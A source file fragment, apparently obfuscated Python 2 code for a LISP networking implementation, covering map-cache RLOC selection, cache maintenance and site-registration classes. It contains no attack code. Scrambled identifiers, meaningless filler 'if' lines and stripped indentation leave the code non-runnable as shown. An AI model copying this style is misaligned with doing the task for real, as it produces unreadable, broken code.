if 81 - 81: Oo0Ooo % ooOoO0o / II111iiii . I11i
if 41 - 41: IiII / OOooOOo * o0oOOo0O0Ooo . iII111i * I1IiiI . iIii1I11I1II1
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_refresh_time
if ( oO000o0Oo00 >= self . map_cache_ttl ) : return ( True )
if 52 - 52: oO0o . OOooOOo . oO0o / Oo0Ooo / i1IIi - I1IiiI
if 69 - 69: Ii1I . o0oOOo0O0Ooo - OoooooooOO
if 15 - 15: OoO0O00 / I1ii11iIi11i
if 86 - 86: OOooOOo * OoOoOO00 % i1IIi * IiII . I1ii11iIi11i
if 72 - 72: i1IIi - I1Ii111 . O0 * OoO0O00
oOo0oO0OO = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( oO000o0Oo00 >= oOo0oO0OO ) : return ( True )
return ( False )
if 17 - 17: IiII
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO % I1IiiI
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . stats . last_increment
return ( oO000o0Oo00 <= 60 )
if 94 - 94: OoooooooOO * I1ii11iIi11i
if 28 - 28: II111iiii / II111iiii / II111iiii
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 70 - 70: OoO0O00 + O0 * OoO0O00
if 25 - 25: OoooooooOO . Oo0Ooo + OOooOOo + Oo0Ooo * O0 % i1IIi
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 71 - 71: II111iiii / Ii1I + i1IIi - OoOoOO00 + Ii1I
if 31 - 31: OoooooooOO * Ii1I - iII111i . oO0o % Ii1I
def delete_rlocs_from_rloc_probe_list ( self ) :
for oOo00O in self . best_rloc_set :
oOo00O . delete_from_rloc_probe_list ( self . eid , self . group )
if 97 - 97: Ii1I
if 51 - 51: II111iiii . oO0o % iII111i
if 47 - 47: II111iiii - iII111i * I1IiiI . IiII
def build_best_rloc_set ( self ) :
IIIi = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 2 - 2: OoOoOO00 - iIii1I11I1II1 * I1Ii111 % II111iiii - Oo0Ooo . OoooooooOO
if 47 - 47: I1Ii111 + oO0o - Ii1I % OoO0O00 - I1Ii111 / i11iIiiIii
if 27 - 27: i11iIiiIii . OoO0O00 + Ii1I
if 47 - 47: I1Ii111 . iIii1I11I1II1 + i11iIiiIii
Oo0O = 256
for oOo00O in self . rloc_set :
if ( oOo00O . up_state ( ) ) : Oo0O = min ( oOo00O . priority , Oo0O )
if 77 - 77: iII111i . I1IiiI - iIii1I11I1II1 + II111iiii / i1IIi
if 65 - 65: I1ii11iIi11i
if 2 - 2: iII111i % I1ii11iIi11i / iII111i
if 93 - 93: iII111i
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if 32 - 32: II111iiii
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
if 41 - 41: iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
for oOo00O in self . rloc_set :
if ( oOo00O . priority <= Oo0O ) :
if ( oOo00O . unreach_state ( ) and oOo00O . last_rloc_probe == None ) :
oOo00O . last_rloc_probe = lisp_get_timestamp ( )
if 25 - 25: Oo0Ooo * oO0o
self . best_rloc_set . append ( oOo00O )
if 78 - 78: OoOoOO00 / II111iiii
if 6 - 6: I1Ii111 . OoOoOO00
if 75 - 75: Oo0Ooo + I11i
if 87 - 87: I1IiiI
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
for oOo00O in IIIi :
if ( oOo00O . priority < Oo0O ) : continue
oOo00O . delete_from_rloc_probe_list ( self . eid , self . group )
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
for oOo00O in self . best_rloc_set :
if ( oOo00O . rloc . is_null ( ) ) : continue
oOo00O . add_to_rloc_probe_list ( self . eid , self . group )
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
if 89 - 89: Oo0Ooo % IiII
def select_rloc ( self , lisp_packet , ipc_socket ) :
IIii1i = lisp_packet . packet
i11IIiI1II = lisp_packet . inner_version
iiiIIiiIi = len ( self . best_rloc_set )
if ( iiiIIiiIi == 0 ) :
self . stats . increment ( len ( IIii1i ) )
return ( [ None , None , None , self . action , None , None ] )
if 47 - 47: O0
if 93 - 93: oO0o
IiI1III1I1 = 4 if lisp_load_split_pings else 0
I1I = lisp_packet . hash_ports ( )
if ( i11IIiI1II == 4 ) :
for IiIIi1IiiIiI in range ( 8 + IiI1III1I1 ) :
I1I = I1I ^ struct . unpack ( "B" , IIii1i [ IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 83 - 83: OOooOOo - I1ii11iIi11i + OoO0O00
elif ( i11IIiI1II == 6 ) :
for IiIIi1IiiIiI in range ( 0 , 32 + IiI1III1I1 , 4 ) :
I1I = I1I ^ struct . unpack ( "I" , IIii1i [ IiIIi1IiiIiI + 8 : IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 99 - 99: iII111i - OoOoOO00 % ooOoO0o
I1I = ( I1I >> 16 ) + ( I1I & 0xffff )
I1I = ( I1I >> 8 ) + ( I1I & 0xff )
else :
for IiIIi1IiiIiI in range ( 0 , 12 + IiI1III1I1 , 4 ) :
I1I = I1I ^ struct . unpack ( "I" , IIii1i [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] ) [ 0 ]
if 27 - 27: oO0o . oO0o * iII111i % iIii1I11I1II1
if 81 - 81: iII111i * II111iiii
if 28 - 28: i11iIiiIii . Oo0Ooo . Ii1I
if ( lisp_data_plane_logging ) :
III1I111i = [ ]
for i11iII1IiI in self . best_rloc_set :
if ( i11iII1IiI . rloc . is_null ( ) ) : continue
III1I111i . append ( [ i11iII1IiI . rloc . print_address_no_iid ( ) , i11iII1IiI . print_state ( ) ] )
if 18 - 18: i1IIi + O0 + o0oOOo0O0Ooo + OoO0O00 / o0oOOo0O0Ooo
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( I1I ) , I1I % iiiIIiiIi , red ( str ( III1I111i ) , False ) ) )
if 8 - 8: i11iIiiIii
if 44 - 44: OoooooooOO - ooOoO0o + I1ii11iIi11i * oO0o
if 73 - 73: O0 * I1Ii111 - i1IIi
if 68 - 68: OOooOOo % IiII / Oo0Ooo + OoOoOO00
if 11 - 11: OoO0O00
if 70 - 70: o0oOOo0O0Ooo * O0 * II111iiii
oOo00O = self . best_rloc_set [ I1I % iiiIIiiIi ]
if 38 - 38: OoO0O00 - I1IiiI * OoooooooOO / I11i . O0
if 77 - 77: OOooOOo + oO0o * iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii
if 92 - 92: Oo0Ooo . o0oOOo0O0Ooo % OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
if 11 - 11: OOooOOo / o0oOOo0O0Ooo
Oo0ooO0O0o00o = lisp_get_echo_nonce ( oOo00O . rloc , None )
if ( Oo0ooO0O0o00o ) :
Oo0ooO0O0o00o . change_state ( oOo00O )
if ( oOo00O . no_echoed_nonce_state ( ) ) :
Oo0ooO0O0o00o . request_nonce_sent = None
if 98 - 98: oO0o + I11i . oO0o
if 10 - 10: iII111i + i1IIi . I11i % ooOoO0o / ooOoO0o
if 86 - 86: Oo0Ooo
if 7 - 7: iIii1I11I1II1
if 86 - 86: IiII + iII111i * II111iiii - IiII - o0oOOo0O0Ooo
if 8 - 8: OOooOOo . Ii1I
if ( oOo00O . up_state ( ) == False ) :
I1I1ii1IIII1Iii1 = I1I % iiiIIiiIi
ooo = ( I1I1ii1IIII1Iii1 + 1 ) % iiiIIiiIi
while ( ooo != I1I1ii1IIII1Iii1 ) :
oOo00O = self . best_rloc_set [ ooo ]
if ( oOo00O . up_state ( ) ) : break
ooo = ( ooo + 1 ) % iiiIIiiIi
if 24 - 24: i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1 . I1IiiI
if ( ooo == I1I1ii1IIII1Iii1 ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 81 - 81: OoOoOO00 * OoOoOO00 + OOooOOo . I11i - oO0o
if 85 - 85: O0 * I1IiiI . Oo0Ooo - IiII
if 84 - 84: I1Ii111 . iIii1I11I1II1 . O0 * I1ii11iIi11i
if 59 - 59: i1IIi . o0oOOo0O0Ooo . Oo0Ooo * I1Ii111 + OoooooooOO
if 11 - 11: I11i * ooOoO0o % iIii1I11I1II1 - O0
if 68 - 68: ooOoO0o * OoooooooOO - OoooooooOO
oOo00O . stats . increment ( len ( IIii1i ) )
if 59 - 59: Ii1I / I11i / I1Ii111 + IiII * I1ii11iIi11i
if 18 - 18: O0
if 60 - 60: II111iiii % O0 - I1Ii111 / iII111i / I1IiiI
if 59 - 59: O0 / iIii1I11I1II1
if ( oOo00O . rle_name and oOo00O . rle == None ) :
if ( lisp_rle_list . has_key ( oOo00O . rle_name ) ) :
oOo00O . rle = lisp_rle_list [ oOo00O . rle_name ]
if 49 - 49: O0 + I1IiiI
if 52 - 52: oO0o
if ( oOo00O . rle ) : return ( [ None , None , None , None , oOo00O . rle , None ] )
if 56 - 56: ooOoO0o
if 94 - 94: OoOoOO00
if 12 - 12: I11i * OoooooooOO + ooOoO0o
if 16 - 16: IiII
if ( oOo00O . elp and oOo00O . elp . use_elp_node ) :
return ( [ oOo00O . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 100 - 100: OoO0O00 % Oo0Ooo - OoooooooOO
if 48 - 48: IiII / I11i * OoooooooOO
if 1 - 1: I1ii11iIi11i + I11i
if 54 - 54: IiII * O0 * I1Ii111 + i1IIi - I11i . I11i
if 39 - 39: I1Ii111
Iiiii = None if ( oOo00O . rloc . is_null ( ) ) else oOo00O . rloc
IiI1iI1 = oOo00O . translated_port
OOo000 = self . action if ( Iiiii == None ) else None
if 21 - 21: i11iIiiIii * I1Ii111 % I11i . oO0o
if 84 - 84: IiII % iII111i
if 79 - 79: O0 / IiII . i1IIi - i1IIi + i1IIi
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
if 5 - 5: i1IIi
oOO000 = None
if ( Oo0ooO0O0o00o and Oo0ooO0O0o00o . request_nonce_timeout ( ) == False ) :
oOO000 = Oo0ooO0O0o00o . get_request_or_echo_nonce ( ipc_socket , Iiiii )
if 47 - 47: I11i * I11i . OoOoOO00
if 68 - 68: OoooooooOO + OoOoOO00 + i11iIiiIii
if 89 - 89: Oo0Ooo + Ii1I * O0 - I1Ii111
if 33 - 33: iIii1I11I1II1 . I11i
if 63 - 63: oO0o - iII111i
return ( [ Iiiii , IiI1iI1 , oOO000 , OOo000 , None , oOo00O ] )
if 13 - 13: I1Ii111 / i1IIi % OoooooooOO / I11i
if 66 - 66: I1Ii111 % o0oOOo0O0Ooo . iII111i . ooOoO0o + OOooOOo * II111iiii
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 33 - 33: oO0o
if 64 - 64: OoO0O00 % Oo0Ooo % I11i . iII111i % I1IiiI
if 50 - 50: i1IIi + ooOoO0o - iIii1I11I1II1
if 45 - 45: OoooooooOO / o0oOOo0O0Ooo / iII111i
if 72 - 72: I1Ii111
for iIII in self . rloc_set :
for oOo00O in rloc_address_set :
if ( oOo00O . is_exact_match ( iIII . rloc ) == False ) : continue
oOo00O = None
break
if 94 - 94: ooOoO0o . IiII - Ii1I + I1ii11iIi11i / ooOoO0o
if ( oOo00O == rloc_address_set [ - 1 ] ) : return ( False )
if 10 - 10: ooOoO0o . OOooOOo * O0 % II111iiii
return ( True )
if 12 - 12: oO0o + I1IiiI * Oo0Ooo - iII111i
if 88 - 88: OOooOOo . OoO0O00
def get_rloc ( self , rloc ) :
for iIII in self . rloc_set :
i11iII1IiI = iIII . rloc
if ( rloc . is_exact_match ( i11iII1IiI ) ) : return ( iIII )
if 86 - 86: OoOoOO00 . o0oOOo0O0Ooo / ooOoO0o * I1IiiI . OoO0O00 / I1Ii111
return ( None )
if 47 - 47: I11i . iII111i * OoOoOO00 % OoooooooOO
if 59 - 59: OoooooooOO + I1ii11iIi11i - I11i / I1IiiI * oO0o
def get_rloc_by_interface ( self , interface ) :
for iIII in self . rloc_set :
if ( iIII . interface == interface ) : return ( iIII )
if 90 - 90: I1Ii111 + i1IIi * I1Ii111 / I11i * Oo0Ooo
return ( None )
if 27 - 27: OoooooooOO
if 42 - 42: OoO0O00 + OoOoOO00
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
Ooooo00 = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( Ooooo00 == None ) :
Ooooo00 = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , Ooooo00 )
if 52 - 52: iII111i * OoOoOO00
Ooooo00 . add_source_entry ( self )
if 80 - 80: I1Ii111 / IiII * o0oOOo0O0Ooo - OoOoOO00 / iIii1I11I1II1
if 38 - 38: II111iiii / I11i + IiII % OoooooooOO
if 27 - 27: OoOoOO00 * OoO0O00 * OOooOOo % I1IiiI * o0oOOo0O0Ooo + I1ii11iIi11i
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
IiiiiII1i = lisp_map_cache . lookup_cache ( self . group , True )
if ( IiiiiII1i == None ) :
IiiiiII1i = lisp_mapping ( self . group , self . group , [ ] )
IiiiiII1i . eid . copy_address ( self . group )
IiiiiII1i . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , IiiiiII1i )
if 73 - 73: i1IIi
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( IiiiiII1i . group )
IiiiiII1i . add_source_entry ( self )
if 52 - 52: IiII / i11iIiiIii * O0
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 67 - 67: OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 54 - 54: i11iIiiIii + OoO0O00 - IiII - iII111i / I11i
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
O000O0o00o0o = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( O000O0o00o0o ) )
if 65 - 65: i11iIiiIii / o0oOOo0O0Ooo % I1ii11iIi11i - O0 % OoooooooOO / o0oOOo0O0Ooo
else :
IiiiiII1i = lisp_map_cache . lookup_cache ( self . group , True )
if ( IiiiiII1i == None ) : return
if 36 - 36: iII111i * OoO0O00 / OOooOOo * IiII * iIii1I11I1II1 / IiII
oo0oO0Oo = IiiiiII1i . lookup_source_cache ( self . eid , True )
if ( oo0oO0Oo == None ) : return
if 82 - 82: OoOoOO00 . oO0o
IiiiiII1i . source_cache . delete_cache ( self . eid )
if ( IiiiiII1i . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 36 - 36: OoOoOO00 . I1ii11iIi11i * I11i % Oo0Ooo
if 25 - 25: II111iiii . I1Ii111 - OoO0O00 * I1IiiI - II111iiii / oO0o
if 80 - 80: OoooooooOO / OoO0O00 / IiII / i1IIi + I1Ii111
if 5 - 5: O0 / iII111i % II111iiii . Oo0Ooo - I11i
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 84 - 84: oO0o * iII111i % i11iIiiIii - O0 . iIii1I11I1II1 - OoOoOO00
if 73 - 73: OoOoOO00
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 66 - 66: Oo0Ooo
if 42 - 42: i11iIiiIii / II111iiii . OOooOOo
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 65 - 65: OoOoOO00 % II111iiii + Oo0Ooo
if 24 - 24: OoO0O00 % OoooooooOO
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
o0OoO0000o = "," + str ( self . secondary_iid )
return ( prefix . replace ( o0OoO0000o , o0OoO0000o + "*" ) )
if 16 - 16: OoOoOO00 % Oo0Ooo * OoOoOO00 . Ii1I
if 91 - 91: I1Ii111 - OoooooooOO . i1IIi . I1ii11iIi11i
def increment_decap_stats ( self , packet ) :
IiI1iI1 = packet . udp_dport
if ( IiI1iI1 == LISP_DATA_PORT ) :
oOo00O = self . get_rloc ( packet . outer_dest )
else :
if 37 - 37: IiII - oO0o
if 92 - 92: I1IiiI
if 51 - 51: OoO0O00 + Oo0Ooo - OOooOOo + I1ii11iIi11i
if 32 - 32: I1ii11iIi11i % OoOoOO00 + Oo0Ooo
for oOo00O in self . rloc_set :
if ( oOo00O . translated_port != 0 ) : break
if 92 - 92: II111iiii . O0 . iIii1I11I1II1 % IiII - i11iIiiIii
if 9 - 9: OoO0O00
if ( oOo00O != None ) : oOo00O . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 60 - 60: O0 / OoOoOO00 % i11iIiiIii % II111iiii / OoooooooOO
if 52 - 52: ooOoO0o
def rtrs_in_rloc_set ( self ) :
for oOo00O in self . rloc_set :
if ( oOo00O . is_rtr ( ) ) : return ( True )
if 100 - 100: Oo0Ooo - o0oOOo0O0Ooo + iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1
return ( False )
if 4 - 4: OoOoOO00 / Oo0Ooo - OoO0O00 . OoOoOO00 / I1Ii111
if 60 - 60: OOooOOo * I1Ii111
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
if 17 - 17: iII111i * I11i / iIii1I11I1II1 - II111iiii
if 97 - 97: II111iiii * o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo . II111iiii
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 76 - 76: II111iiii + I1Ii111 . OoooooooOO / IiII % i11iIiiIii
if 87 - 87: Ii1I / OoOoOO00 / OOooOOo
def get_timeout ( self , interface ) :
try :
IIiIIIiII1Ii1 = lisp_myinterfaces [ interface ]
self . timeout = IIiIIIiII1Ii1 . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 39 - 39: IiII . II111iiii
if 42 - 42: I1ii11iIi11i . Oo0Ooo * I1IiiI / Oo0Ooo
if 83 - 83: i11iIiiIii / OoOoOO00
if 37 - 37: iIii1I11I1II1 % IiII / i11iIiiIii - oO0o
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 43 - 43: II111iiii - OoooooooOO
if 11 - 11: I1IiiI
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 76 - 76: iII111i - II111iiii % Oo0Ooo . I1Ii111
if 64 - 64: OoO0O00 - OoO0O00
if 93 - 93: Oo0Ooo . O0
if 75 - 75: iII111i * II111iiii - I1IiiI
if 30 - 30: i1IIi / ooOoO0o . ooOoO0o
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
if 46 - 46: I1Ii111
if 87 - 87: o0oOOo0O0Ooo - iII111i * OoO0O00 * o0oOOo0O0Ooo . o0oOOo0O0Ooo / OOooOOo
if 50 - 50: i11iIiiIii - II111iiii * OoooooooOO + II111iiii - ooOoO0o
def lisp_is_group_more_specific ( group_str , group_mapping ) :
o0OoO0000o = group_mapping . group_prefix . instance_id
iIi1iii1 = group_mapping . group_prefix . mask_len
O0o00oOOOO00 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , o0OoO0000o )
if ( O0o00oOOOO00 . is_more_specific ( group_mapping . group_prefix ) ) : return ( iIi1iii1 )
return ( - 1 )
if 52 - 52: i1IIi + i1IIi * i1IIi / OoOoOO00
if 98 - 98: iII111i . i1IIi + o0oOOo0O0Ooo * OoooooooOO - i11iIiiIii
if 21 - 21: i11iIiiIii . oO0o * o0oOOo0O0Ooo + Oo0Ooo * OoOoOO00 * o0oOOo0O0Ooo
if 33 - 33: I1IiiI + O0 - I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
def lisp_lookup_group ( group ) :
III1I111i = None
for iiIIiIiiII in lisp_group_mapping_list . values ( ) :
iIi1iii1 = lisp_is_group_more_specific ( group , iiIIiIiiII )
if ( iIi1iii1 == - 1 ) : continue
if ( III1I111i == None or iIi1iii1 > III1I111i . group_prefix . mask_len ) : III1I111i = iiIIiIiiII
if 23 - 23: II111iiii / iII111i
return ( III1I111i )
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
if 92 - 92: iIii1I11I1II1
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 47 - 47: Oo0Ooo + Oo0Ooo * ooOoO0o - OoOoOO00 + II111iiii
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 10 - 10: II111iiii / ooOoO0o . Ii1I / I1Ii111 / oO0o
if 8 - 8: OOooOOo / ooOoO0o * I11i + OOooOOo * i1IIi
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 88 - 88: oO0o * o0oOOo0O0Ooo
if 5 - 5: I11i - I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
def print_flags ( self , html ) :
if ( html == False ) :
Oo0Ooo0O0 = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# Oo0Ooo * OOooOOo / OoOoOO00 + IiII - i1IIi - O0
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
I11ii1i1I = self . print_flags ( False )
I11ii1i1I = I11ii1i1I . split ( "-" )
Oo0Ooo0O0 = ""
for IiiO0OOoo in I11ii1i1I :
OOOOoo0o = lisp_site_flags [ IiiO0OOoo . upper ( ) ]
OOOOoo0o = OOOOoo0o . format ( "" if IiiO0OOoo . isupper ( ) else "not " )
Oo0Ooo0O0 += lisp_span ( IiiO0OOoo , OOOOoo0o )
if ( IiiO0OOoo . lower ( ) != "n" ) : Oo0Ooo0O0 += "-"
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
if 8 - 8: O0 - O0 % Ii1I
return ( Oo0Ooo0O0 )
if 22 - 22: OoOoOO00
if 85 - 85: II111iiii - II111iiii
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 95 - 95: II111iiii + II111iiii + iII111i
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 38 - 38: OoO0O00 * Ii1I * O0 / I1IiiI
if 99 - 99: Oo0Ooo + ooOoO0o - I1ii11iIi11i + I1Ii111 + Ii1I * I1IiiI
def build_sort_key ( self ) :
o0Oo0O0 = lisp_cache ( )
o00O0Oo , ii1i1I1111ii = o0Oo0O0 . build_key ( self . eid )
i1i11i111i1I1 = ""
if ( self . group . is_null ( ) == False ) :
o0o0oOo00Oo , i1i11i111i1I1 = o0Oo0O0 . build_key ( self . group )
i1i11i111i1I1 = "-" + i1i11i111i1I1 [ 0 : 12 ] + "-" + str ( o0o0oOo00Oo ) + "-" + i1i11i111i1I1 [ 12 : : ]
if 32 - 32: IiII % OOooOOo . Ii1I
ii1i1I1111ii = ii1i1I1111ii [ 0 : 12 ] + "-" + str ( o00O0Oo ) + "-" + ii1i1I1111ii [ 12 : : ] + i1i11i111i1I1
del ( o0Oo0O0 )
return ( ii1i1I1111ii )
if 27 - 27: o0oOOo0O0Ooo
if 73 - 73: i11iIiiIii % II111iiii - Ii1I . IiII
def merge_in_site_eid ( self , child ) :
oOooOoOooOO = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
oOooOoOooOO = self . merge_rles_in_site_eid ( )
if 98 - 98: o0oOOo0O0Ooo - OoO0O00 . I1ii11iIi11i / OOooOOo
if 43 - 43: I1IiiI + OOooOOo + o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo % OoO0O00 . OoooooooOO
if 21 - 21: Oo0Ooo * Oo0Ooo - iII111i - O0
if 87 - 87: OOooOOo / I1Ii111 - Ii1I + O0 - oO0o - O0
if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 41 - 41: OOooOOo + Oo0Ooo % I1IiiI
return ( oOooOoOooOO )
if 3 - 3: ooOoO0o * Ii1I
if 29 - 29: OoooooooOO + OOooOOo
def copy_rloc_records ( self ) :
Ooo0O0 = [ ]
for iIII in self . registered_rlocs :
Ooo0O0 . append ( copy . deepcopy ( iIII ) )
if 47 - 47: OoO0O00
return ( Ooo0O0 )
if 98 - 98: OoooooooOO - oO0o / O0
if 23 - 23: o0oOOo0O0Ooo % OoooooooOO % iIii1I11I1II1 / OoOoOO00 / I1Ii111
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for oO00Oooo0o0o0 in self . individual_registrations . values ( ) :
if ( self . site_id != oO00Oooo0o0o0 . site_id ) : continue
if ( oO00Oooo0o0o0 . registered == False ) : continue
self . registered_rlocs += oO00Oooo0o0o0 . copy_rloc_records ( )
if 6 - 6: Oo0Ooo
if 70 - 70: iIii1I11I1II1 * I1ii11iIi11i
if 17 - 17: Ii1I * i1IIi % OoO0O00
if 12 - 12: I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 % iII111i
if 80 - 80: Oo0Ooo
